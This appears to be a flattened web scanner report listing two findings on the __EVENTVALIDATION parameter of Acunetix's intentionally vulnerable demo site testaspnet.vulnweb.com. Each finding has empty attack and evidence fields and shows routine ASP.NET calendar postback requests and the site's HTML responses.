Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8490&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDA%2Fd56MdsIZGRkR6HO4UlFC7B4YXC3vXogrGBqtC0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL0qv%2F7CALTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwejufo1%2FvkpwNlxX%2Fg4Mz2PRI7kRQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:01:54 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDA/d56MdsIZGRkR6HO4UlFC7B4YXC3vXogrGBqtC0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL0qv/7CALTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwejufo1/vkpwNlxX/g4Mz2PRI7kRQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:White" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8125&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAAN2apEtoIZGRklorD%2F%2FcZPNer00YuHR%2FoX5slD2Y%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL11IjhCAKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDErlSakwbSwf%2BYfaX8qmN%2BdFcET3
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:51:36 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAAN2apEtoIZGRklorD//cZPNer00YuHR/oX5slD2Y=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL11IjhCAKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDErlSakwbSwf+YfaX8qmN+dFcET3" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:White" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
